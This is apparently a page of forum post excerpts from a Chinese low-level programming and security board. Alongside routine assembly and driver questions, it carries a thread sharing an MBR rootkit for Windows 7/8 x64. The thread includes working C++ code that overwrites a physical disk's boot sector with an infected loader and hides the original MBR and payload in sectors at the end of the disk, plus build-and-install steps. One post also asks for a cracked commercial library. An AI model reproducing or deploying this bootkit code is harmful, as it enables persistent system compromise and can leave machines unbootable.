|
[Help] Question about if statements in assembly
Does nobody know how?????????????????? |
|
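[Help] Looking for the full version of ToolkitPro v16.2.6
Mainly I want to use it with vs2013; the cracked version currently available only supports vs2010. |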
|
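[Help] How to write inline assembly in C++
I want to put text in the code segment and then push it onto the stack as an argument. _emit can only define one byte at a time; which macro can define multiple bytes at once? |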
|
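[Original] Posting an MBR rootkit for win7 win8 x64, written 2 years ago.
There's nothing I can do about this either. If the MBR isn't restored, the system can't boot afterwards; it seems Microsoft calls the MBR once more later on. |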
|
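[Help] How to block League of Legends from running
Back in the day I also played League of Legends for 2 years, day and night, and ended up with severe fatty liver. Tencent, that bloodsucking company, should at least limit daily play time and force a logout after 4 hours. I haven't played for over a month now and feel much more energetic. Invite a few girls over to your place to tempt him |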
|
|
|
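[Original] Posting an MBR rootkit for win7 win8 x64, written 2 years ago.
1. Yes, 446 bytes should be written to the MBR, but WriteFile can only write multiples of 512. 2. The 66 bytes include the partition table and the 2-byte MBR end signature 55AA. 3. Try the one I compiled. |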
|
[Original] Posting an MBR rootkit for win7 win8 x64, written 2 years ago.
void CFileManager::WriteMbr(LPSTR lpFileFullPath) { //_asm{int 3} HANDLE hFile=pCreateFileA(lpFileFullPath,GENERIC_READ, FILE_SHARE_READ,NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile != INVALID_HANDLE_VALUE) { DWORD dwSize; dwSize = pGetFileSize(hFile, NULL); LPBYTE lpBuffer = new BYTE[dwSize]; DWORD dwBytesRead; pReadFile(hFile, lpBuffer, dwSize, &dwBytesRead, NULL); HANDLE hPhysicalDrive = CreateFile("\\\\.\\PHYSICALDRIVE0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hPhysicalDrive == INVALID_HANDLE_VALUE) { // OutputDebugString("Open Drive0 Failed!"); delete lpBuffer; CloseHandle(hFile); return; } BYTE BootSector[512];//original MBR DWORD NumberOfBytesRead; if (SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN) == INVALID_SET_FILE_POINTER || !ReadFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL) ) { delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } BYTE backBootSector[512]; memcpy(&backBootSector,&BootSector,512); memcpy(&backBootSector,lpBuffer,446); SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN);//reading the file moves the pointer, so it has to be reset WriteFile(hPhysicalDrive,backBootSector,512,&NumberOfBytesRead,NULL);//infect 446 bytes of the MBR DISK_GEOMETRY_EX pdg = { 0 }; DWORD junk = 0; // discard results DeviceIoControl(hPhysicalDrive, // device to be queried IOCTL_DISK_GET_DRIVE_GEOMETRY_EX, // operation to perform NULL, 0, // no input buffer &pdg, sizeof(pdg), // output buffer &junk, // # bytes returned (LPOVERLAPPED) NULL); // synchronous I/O //back up the MBR LARGE_INTEGER PositionFileTable; PositionFileTable.QuadPart = pdg.DiskSize.QuadPart/512; PositionFileTable.QuadPart -= 10; PositionFileTable.QuadPart *= 512; NumberOfBytesRead=0; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER || !WriteFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL)) { delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } // 
OutputDebugString("Write Other"); //write the rest of the MBR data PositionFileTable.QuadPart = pdg.DiskSize.QuadPart/512; PositionFileTable.QuadPart -= 9; PositionFileTable.QuadPart *= 512; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER || !WriteFile(hPhysicalDrive, lpBuffer+512, ((dwSize-512)/512+1)*512, &NumberOfBytesRead, NULL))//the third argument of WriteFile must be a multiple of 512 { // OutputDebugString("Write Other Failed!"); delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } //back up the MBR loader PositionFileTable.QuadPart = pdg.DiskSize.QuadPart/512; PositionFileTable.QuadPart -= 11; PositionFileTable.QuadPart *= 512; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER || !WriteFile(hPhysicalDrive, backBootSector, 512, &NumberOfBytesRead, NULL))//the third argument of WriteFile must be a multiple of 512 { // OutputDebugString("Write Other Failed!"); delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } } |
|
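[Original] Posting an MBR rootkit for win7 win8 x64, written 2 years ago.
doslink aa.obj /tiny produces aa.com. Write the first 512 bytes of aa.com to the MBR, taking care not to overwrite the partition table. Write the data after the first 512 bytes to the 11th-from-last sector of the disk. Write the original MBR to the 10th-from-last sector. |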
|
[Original] Posting an MBR rootkit for win7 win8 x64, written 2 years ago.
My first ever featured post, so happy |
|
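Blue screen when unloading a keyboard filter driver; the IRPs have already been released, but it still blue-screens
That setting is in place; it only unloads when the value is 0 at unload time. |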